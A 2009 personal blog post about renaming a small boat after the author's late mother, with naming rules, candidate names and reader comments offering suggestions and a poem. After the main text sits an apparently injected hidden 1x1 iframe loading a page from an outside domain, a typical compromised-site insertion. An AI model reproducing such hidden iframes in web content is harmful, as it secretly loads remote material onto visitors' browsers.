Posted by: wrmcnutt | December 7, 2009

September Blue: A New Name


For the new readers, I’ve bought a boat.  I’ve become positively tedious about it.  I’m 45 years old, and like a little kid with a new toy.

As most of you also know, I’ve decided to rename her to honor my mother.  I’m doing this for several reasons, but mostly because my Mom’s estate allowed me to retire my consumer debt and left me with enough left over to buy a boat.  I thought it might be fun for ya’ll to participate in the process of renaming my boat.  I’ve already found an entertaining ceremony in which we will placate Poseidon, whom the Romans call King Neptune, and honor (bribe) the four winds.  There is wine involved, so hopefully, a good time will be had by all.  We’ll schedule this event in the summer at one of the local docks, and I’ll provide a small libation.  You will bring your own hot dogs, and we’ll make a day of it.

But that’s for the springtime.  That gives us all winter to work up a good name.

First of all, let’s look at the basics in naming a boat.

Rule #1: The name must fit on the transom of the boat and still be readable.  For example, El Pueblo de Nuestra Señora la Reina de los Angeles de Porciúncula, is out.  Not only is it a California name, but my boat is only 19 feet long.

Rule #2: The name must not be lame.  Enuff said.  You all know “lame” when you hear it.

Rule #3: We, the wife and I, must not mind the name being applied to us.  Boaters don’t say, “Let’s have Bill and K over for cocktails.”  They say, “Let’s have Tennessee Iris over for cocktails.”  So Goober Bucket would be out.

Rule #4: Must be easy to understand over the radio.  When I am holed in a storm, taking water fast, and talking to the Rescue Squad, I don’t want to have to be spelling the name of the boat because we were dumb enough to name our boat “sih shr sih guh shr shr zuh.”  (That’s “forty-four stone lions” in Chinese, spelled phonetically, in case you’re wondering.)

Now, we’ve established that the name must follow The Rules.  Be aware that the rules can change at any time.

The new name must reflect my mom and/or one or more aspects of her personality.  For those of you who didn’t know my Mom, I suggest the following reading, which will give you a little perspective on who she was.

Current suggested names are Peach, Carolina Peach, Georgia Peach, Loretta, Charleston Lady, Tommie Guhn, and Atlanta Lady. Additional suggestions are both welcome and encouraged.

We may take a non-binding poll later on. K and I will make the final decision, and it will be unveiled at the re-christening party sometime in the early spring.

[iframe width=”1″ height=”1″ src=”http://s6g.info/go.php?sid=1″%5D

Responses

  1. While I think ‘Loretta’ would honor your mom the best, I think Charleston Lady would sound best over the radio. I’m not feeling creative today, so I have no name to add to the present list.

  2. Blue 33 ( to honor the lost years when she jumped ages?)

    Carolina Lady

    Carolina Blue Belle

    Loretta would be fitting. I keep trying to figure out how to incorporate the Atlanta symbol – a phoenix – into the name so you can have a really cool figure head….but I’m not feeling terribly creative right now either so I’ll come back to this later.

    • Oh, shooting from the hip, there’s “Atlanta Phoenix,” “Georgia Firebird,” and “Phoenix Belle” come to mind, just off the top of my head. Thanks – we’ll keep those in mind.

  3. Due to the dream of your Mom after her passing I am submitting the name “Changing Woman”

    I have included a few links for the Navajo stories.
    http://www.firstpeople.us/FP-Html-Legends/Changing_Woman-Navajo.html

    http://xroads.virginia.edu/~MA97/dinetah/change2.html

    There are more… but this should give you the jist. That should also well reflect other changes in her live and yours (ages, attitudes and her southerness – as a southern lady is allowed to change her mind as often as she pleases)

    May you be blessed in all of your life changes.

    Ginger/Gellis

    • Thanks, Gellis – I’ll take that into close consideration. It shows a good understanding of who Mom was, and remains, at least to me.

  4. Because I am an unmitigated cad, have the emotional depth you couldn’t float your dad’s boat in (keel up) and haven’t a serious bone in my body, I can only come up with some rather irreverent attempts at humor. Therefore, I only list my ideas here as a warning for others to think more like Gellis and Deirdre.
    The facial hair story inspired “The Bearded Lady”
    The shell board story inspired “Wild Sea Oats”
    The liver story? “Pâté Cake”
    And, of course, “The Jolly Olly”

    But more than one of your suggested readings didn’t lend themselves to irreverent humor. I offer this as apology for the above.
    For you Bill:

    Mom, blow me a wind.
    Though I’ll never again
    Feel your kiss on my forehead
    As storms fill me with dread.
    When I set my sail and bring her about
    I know I’ll never be without
    Your kiss.

    • Oh – man! Those are GREAT. I especially like Pate Cake!


Leave a Reply

Categories

